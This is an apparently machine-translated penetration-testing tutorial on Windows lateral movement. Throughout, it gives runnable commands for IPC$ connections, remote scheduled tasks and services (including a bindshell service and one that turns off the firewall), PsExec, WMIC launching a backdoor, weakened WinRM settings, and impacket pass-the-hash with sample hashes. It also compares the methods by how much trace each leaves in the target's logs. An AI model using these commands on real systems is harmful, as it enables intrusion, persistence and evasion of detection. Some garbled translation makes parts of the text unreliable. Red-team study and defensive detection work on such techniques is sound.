Title: Intranet penetration lateral movement techniques

In normal circumstances, horizontal movement is to move horizontally when sufficient permissions have been obtained. Most of the following methods also require high permission operations.

https://www.freebuf.com/articles/network/251364.html

There are three situations for horizontal movement of the intranet:

1. Perform horizontal movement in a VPN environment;

2. Perform horizontal movement in the socks proxy environment;

3. Perform horizontal movement in the environment of a remote Trojan;

File Transfer-Preparation

In the process of horizontal movement, the first thing we should consider is the file transfer scheme, which provides convenience for later deployment of attack payloads or other files to the attack target.

Network Sharing

In the windows system, the network sharing function can realize file sharing between local area networks. Provide valid user credentials to transfer files from one machine to another.

Get the network share enabled by default in Windows.

net share

In actual combat, IPC$ connection is often used, and IPC$ connection requires two requirements.

1. The remote host has enabled IPC connection;

2. The 139 and 445 ports of the remote host are open;

net use \\10.10.10.10\IPC$ 'admin!@#456' /user:'administrator'

At this time, if you have sufficient permissions, you can use the dir or copy command to view the information of the target host.

Security considerations: These instructions are locally executed, remote commands, so they do not leave log information on the remotely connected host, so they are relatively safe.

Build an SMB server

https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E9%80%9A%E8%BF%87%E5%91%BD%E4%BB%A4%E8%A1%8C%E5%BC%80%E5%90%AFWindows%E7%B3%BB%E7%BB%9F%E7%9A%84%E5%8C%BF%E5%90%8D%E8%AE%BF%E9%97%AE%E5%85%B1%E4%BA%AB

SMB (server message block), also known as CIFS (network file sharing system), is based on the application layer network transmission protocol, generally uses NetBIOS protocol or TCP to send, and uses ports 139 or 445.

Create an SMB server that both parties can access, and intranet penetration, let the victim host remotely load Trojans and other operations to control the target host.

The difference between CIFS protocol and SMB protocol

**Ideas about CIFS permissions: **If we take down a machine and there are vulnerabilities such as constrained delegation or silver bills, we will obtain the domain control's Cifs permissions through operations. Then we can use the tools such as psexec.py and smbexec.py in the impacket toolkit, and then use the -no-pass -k parameter to directly connect to the domain control to obtain permissions by reading the local bills.

However, when the impacket toolkit uses the -no-pass -k parameter, it detects .ccache tickets, and on Windows, it uses .kirbi-end tickets, so it cannot be successful. It can be successful on linux.

If you can obtain the domain control's Cifs permission, modify the impack tool, or write other tools, and use CIFS permissions to directly obtain the domain control.

Planning Tasks

The execution method is the same as the VPN and socks method. Generally speaking, administrator credentials are required to be obtained before the scheduled task can be executed.

By building an SMB server or establishing a shared connection, the target machine downloads and runs the script, and then establishes a planned task to execute script loading Trojans, etc.

When the target system version window2012 is used:

net use \\192.168.3.21\ipc$ 'Admin12345' /user:god.org\administrator # Establish an ipc connection

copy add.bat \192.168.3.21\c$ #Copy the execution file to the target machine

at \\192.168.3.21 15:47 c:\add.bat #Add scheduled tasks

When the target system version=windows2012, use schtasks:

net use \\192.168.3.32\ipc$ 'admin!@#45' /user:god.org\administrator # Establish an ipc connection

copy add.bat \\192.168.3.32\c$ #Copy the file to its C drive

schtasks /create /s 192.168.3.32 /ru 'SYSTEM' /tn adduser /sc DAILY /tr c:\add.bat /F #Create the corresponding execution file of adduser task

/s: Specify the system to be linked; /ru: Specify the user permissions for the scheduled task to run; /tn: Specify the name of the created scheduled task;

/sc: Specify the frequency of execution of scheduled tasks; /tr: Specify the program path to which scheduled tasks run; /F: Force creation if the specified task exists;

/mo: Specify the scheduled task execution cycle;

schtasks /query /s 10.10.10.10 /TN c # View scheduled task c status

schtasks /run /s 192.168.3.32 /tn adduser /i #Run adduser task

schtasks /delete /s 192.168.3.21 /tn adduser /f#Delete adduser task

Note that the program that schedules task execution is executed in the background and has no echo.

In terms of logging, as long as the remote connection operation is performed, the IP is an NTLM authentication packet, and the domain name or machine name is a Kerberos authentication packet.

The addition, deletion, execution and other operations of planned tasks are also reflected in the target host.

Microsoft-Windows-TaskScheduler/Operational: This event log records the operations, creation, modification and deletion of scheduled tasks. You can find this log in the Windows Event Viewer. The path is: Event Viewer - Applications and Services Logs - Microsoft - Windows - TaskScheduler - Operational. Microsoft-Windows-TaskScheduler/Maintenance: This event log is used to record the execution of scheduled tasks, including the start, completion and error information of the task. Also, in Windows Event Viewer you can find this log. The path is: Event Viewer - Applications and Services Logs - Microsoft - Windows - TaskScheduler - Maintenance. Security considerations: Although the scheduled task is executed remotely, a scheduled task process will be established on the target host, and the process will also execute files on the target host. These behaviors will leave log records on the target host, so it is more dangerous.

System Service

The execution method is the same as the VPN and socks method. You can also run specified programs or commands on the remote host by creating system services on the remote host.

This method requires administrator rights to both hosts.

sc \\[Hostname/IP] create [servicename] binpath='[path]' #Create scheduled task startup program

sc \\10.10.10.10 create bindshell binpath='c:\bind.exe'

Note the format here, "=" must be empty after ", otherwise an error will occur.

Start the service

sc \\10.10.10.10 start bindshell

Delete the service

sc \\[host] delete [servicename] #Delete service

We can also turn off the firewall by setting up a service:

sc \\WIN-ENS2VR5TR3N create unablefirewall binpath='netsh advfirewall set allprofiles state off'

sc \\WIN-ENS2VR5TR3N start unablefirewall

In terms of logging, as long as the remote connection operation is performed, the IP is an NTLM authentication packet, and the domain name or machine name is a Kerberos authentication packet.

The logs on system services will also leave traces.

Security considerations: Using the method of creating system services will create services on the remote host and leave log records on the target host, so it is more dangerous.

PSEXEC

The execution method is the same as the VPN and socks method. psToolspsexec is a service that connects to the Admin$ share of the server through SMB, and releases a binary file named "psexesvc.exe", and then registers a service named "PSEXEC". When the command is executed, the corresponding program will be started through the service to execute the command and echo. After the run is completed, the PSEXESVC service will be deleted.

Therefore, the conditions required to run psexec:

1. The target host enables Admin$ sharing;

2. Open port 139 or 445 to run SMB;

3. Need permissions of the target host to create a service;

PsExec.exe -accepteula \\192.168.52.138 -u god\liukaifeng01 -p Liufupeng123 -i -s cmd.exe

-accepteula: The first time you run psexec, a confirmation box will pop up, and using this parameter will not pop up the confirmation box.

-u: Username

-p: Password

-s: Run the haul process with system permissions and obtain an interactive shell with system permissions. If this parameter is not used, a shell with user permissions used to connect will be obtained

The impacket package Psexec.py allows you to execute processes on remote Windows systems, copy files, and return processing output results. In addition, it allows you to execute remote shell commands directly using the full interactive console (no need to install any client software).

python psexec.py [[domain/] username [: password] @] [Target IP Address]

python psexec.py VVVV1/admins:User\!@#[email protected]

# Obtain the target domain user interactive shell through hash password connection

python psexec.py -hashes :ccef208c6485269c20db2cad21734fe7 god/[email protected]

The commands for python files and exe files are the same.

When using psexec, not only will the login log will be generated in the domain control, but the log information will also be generated in the target machine.

Event ID: 7045

Use the official PSEXEC TOOLS

When using the PSEXEC tool in the impacket package to connect, it is found that the generated service name will be automatically modified (it has a certain hidden effect on the service)

Security analysis: When psexec is executed, it will not only upload a file, but also create a service. These will be logged by the target host, so it is more dangerous.

WMI

The execution method is the same as the VPN and socks method. The full name of WMI is (Windows Management Instrumentation, Windows Management Specification), and users can manage local and remote computers through WMI. The protocols used by WMI are DCOM (Distributed Component Object Model) and WinRM (Windows Remote Management).

Conditions required to run WMI:

1. The WMI service of the remote host is in the enabled state;

2. Both hosts open and release port 135;

On Windows you can use wmic.exe and PowerShell Cmdlets to use WMI data and execute WMI methods.

wmic /node:192.168.183.130 /USER:administrator PATH win32_terminalservicesetting WHERE (__Class!='') CALL SetAllowTSConnections 1

//wmic /node:'[full machine name]' /USER:'[domain]\[username]' PATH win32_terminalservicesetting WHERE (__Class!='') CALL SetAllowTSConnections 1

Query remote process information

wmic /node:192.168.183.130 /user:administrator /password:Liu78963 process list brief

Wmic command execution has no echo, so the result is to be written to txt

wmic /node:192.168.183.130 /user:administrator /password:Liu78963 process call create 'cmd.exe /c ipconfig C:\result.txt'

wmic /node:192.168.183.130 /user:administrator /password:Liu78963 process call create 'cmd.exe /c command C:\result.txt'

wmic /node:192.168.183.130 /user:administrator /password:Liu78963 process call create 'directory\backdoor.exe'

///node: Specify the server to which it will be operated

In terms of logging, as long as the remote connection operation is performed, the IP is an NTLM authentication packet, and the domain name or machine name is a Kerberos authentication packet. Except for authentication operations, wmic remote execution commands will not generate logs in normal circumstances. Only the command line audit function is turned on. When using wmic commands to perform any operations, the relevant events will be recorded in the Windows event log.

DCOM Utilization

The execution method is the same as the VPN and socks method. https://www.freebuf.com/articles/web/293280.html

WinRM utilization

The execution method is the same as the VPN and socks method. http://www.mchz.com.cn/cn/service/Safety-Lab/info_26_itemid_4124.htmlWinRM implements remote management by executing the WS-management protocol, allowing Windows computers in the same network to access and exchange information with each other, and the corresponding port is 5985.

In servers with Windows-2008 or above, the WinRM service will be automatically started. When using WinRM service for horizontal movement, you need to have the administrator credentials of the remote host.

Install WinRM service

1. Check whether to enable winrm

winrm e winrm/config/listener

If the error is reported, it is not enabled

2. Turn on the service

To use CMD in administrator mode. Because Powershell will not be executed

winrm quickconfig

There will be two questions, just enter "y"

3. Winrm service setting auth

winrm set winrm/config/service/auth '@{Basic='true'}'

4. Configure the encryption method for winrm service to allow non-encryption (if this is not configured, a remote connection will cause an error)

winrm set winrm/config/service '@{AllowUnencrypted='true'}'

5. Check winrm configuration

winrm get winrm/config

Configure TrustedHosts

winrm set winrm/config/client @{TrustedHosts='10.10.10.10'} #Trusted Host 10.10.10.10

Set-Item WSMan:localhost\client\trustedhosts -value * #powershell Trust all hosts

Command execution

winrs -r:http://10.10.10.10.10:5985-u:Administrator -p:admin!@#456 'whoami'

winrs -r:http://10.10.10.10.10:5985-u:Administrator -p:admin!@#456 'cmd'

In terms of logging, as long as the remote connection operation is performed, the IP is an NTLM authentication packet, and the domain name or machine name is a Kerberos authentication packet. Except for authentication operations, winRM remote execution of commands will not generate logs in normal circumstances.

Linux performs horizontal penetration

Generally, horizontal penetration is performed in Linux, and the Impacket toolkit is used for penetration, which is a python script.

wmiexec.py

The execution method is the same as the VPN and socks method. It generates a semi-interactive shell using Windows Management Instrumentation and runs as an administrator. You don't need to install any service/agent on the target server, so it's very hidden.

python wmiexec.py [[domain/] username [: password] @] [Target IP Address]

python wmiexec.py VVVV1/admins:User\!@#[email protected] (Note: If there is one in the password, you need to escape it)

python wmiexec.py -hashes :518b98ad4178a53695dc997aa02d455c ./[email protected]

The login log is left in the domain control host, but the client host in the socks tunnel does not leave in the login log.

psexec.py

The execution method is the same as the VPN and socks method. Psexec.py allows you to execute processes on remote Windows systems, copy files, and return processing output results. In addition, it allows you to execute remote shell commands directly using the full interactive console (no need to install any client software).

python psexec.py [[domain/] username [: password] @] [Target IP Address]

python psexec.py VVVV1/admins:User\!@#[email protected]

# Obtain the target domain user interactive shell through hash password connection

python psexec.py -hashes :ccef208c6485269c20db2cad21734fe7 god/[email protected]

When using psexec, not only will the login log will be generated in the domain control, but the log information will also be generated in the target machine.

Event ID: 7045

Use the official PSEXEC TOOLS

When using the PSEXEC tool in the impacket package to connect, it is found that the generated service name will be automatically modified (it has a certain hidden effect on the service)